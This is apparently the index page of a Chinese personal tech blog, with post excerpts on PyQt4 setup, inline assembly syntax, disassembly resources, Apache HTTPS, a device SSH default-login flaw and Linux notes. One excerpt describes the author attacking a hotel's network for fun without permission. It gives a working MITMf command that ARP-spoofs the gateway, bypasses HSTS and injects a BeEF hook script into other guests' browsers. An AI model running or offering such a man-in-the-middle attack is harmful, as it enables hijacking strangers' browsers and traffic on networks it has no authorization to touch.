返回顶部

分享一组好玩的科学家表情GIF

浅析操作系统函数调用原理-附实例

谈谈编程中的完美主义和取舍

coding-powers-1000x663.jpg
不论是在生活还是在工作中,常常在需要完成某件事情的时候,出于完美主义的情结,会想方设法的让自己陷入一种无限羁绊的尴尬境地。这时,也许是时候对自己目前所做的工作去做更深层次的思考,进而对外在的形式有所取舍,才能达到内心想要达到的真正目的。

-阅读全文-

节日送什么礼物给妹纸比较文艺

一年当中有那么多个节日,每个节日都要面临给女神送什么礼物的烦恼。
今天Chorder向你推荐一款小清新的尤克里里,超萌超文艺,拿过的妹纸都说爱不释手~

诺,就是下面这样啦,拿在妹纸的手上简直萌萌哒~

24.jpg

-阅读全文-

PyQt4解析HTML Dom

环境:
Windows 10
Python 2.7.10

0x01 安装PyQt4
在这个页面下载,注意选对版本。
https://riverbankcomputing.com/software/pyqt/download
我选择的版本是 PyQt4-4.11.4-gpl-Py2.7-Qt4.8.7-x64.exe

0x02 编写测试脚本

import sys
from PyQt4 import QtGui

app = QtGui.QApplication(sys.argv)
widget = QtGui.QWidget()
widget.resize(250, 150)
widget.setWindowTitle('PyQt')
widget.show()
sys.exit(app.exec_())

如果成功运行并弹出一个空白的窗口,说明PyQt4已经安装上了。

0x03 使用PyQt4的QtWebKit实现解析Dom

待续。

写给迷茫的朋友

VC内联汇编和GCC内联汇编的语法区别

VC:

#include <stdio.h>

main(){
    int a = 1;
    int b = 2;
    int c;
    __asm{
        mov eax,a
        mov ebx,b
        mov ecx,1h
        add eax,ebx
        mov c,ecx
    }
    printf("%x\n", c);
}

GCC:

#include <stdio.h>

main(){
    int a = 1;
    int b = 2;
    int c;
    asm(
        "add %2,%0"        //1
        :"=g"(c)           //2
        :"0"(a),"g"(b)     //3
        :"memory"          //4
    );
        printf("%x\n", c);
}

反汇编技术笔记-基础知识

---------------|相关学习资源|---------------
二进制安全相关工具和教程站点
http://www.openrce.org
http://www.ollydbg.de
http://www.sysersoft.com
http://www.idapro.com
http://www.woodmann.com
http://www.hex-rays.com IDA pro

-阅读全文-

如何在搬瓦工(bandwagonhost)购买廉价VPS服务器

Beef+MITMF小撸酒店内网

出差,晚上闲着无聊。
于是想撸一撸酒店的内网,但是之前已经撸过很长时间了,这个地方的重要系统都做了隔离,不好撸,所以就玩玩中间人攻击好了。
用的工具:

OS       Debian 8
MITMF    https://github.com/byt3bl33d3r/MITMf.git
beef     https://github.com/beefproject/beef.git

先启动beef,直接在beef的目录下面./beef就运行了。
1.png
然后启动MITMF,进行中间人攻击,设置payload为beef的evil js

python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.64.254 --hsts --inject  --js-url http://192.168.71.0:3000/hook.js

2.png
然后就。。。
3.png

Apache服务器配置https

5.jpg
每次在公共场合的电脑上登录博客的后台,总感觉会有双手在背后偷偷拿走我的密码。
所以给博客配置下https好让自己安心一点。

-阅读全文-

Array设备SSH默认用户登录漏洞

这是一个比较老的漏洞了,但是到目前为止仍然有不少厂商在使用这个版本的设备。在渗透中也曾经遇到过。
参考自:https://www.exploit-db.com/exploits/32369/

-阅读全文-

Linux设备驱动学习笔记

嵌入式Linux学习路线(转载)

Linux内核学习笔记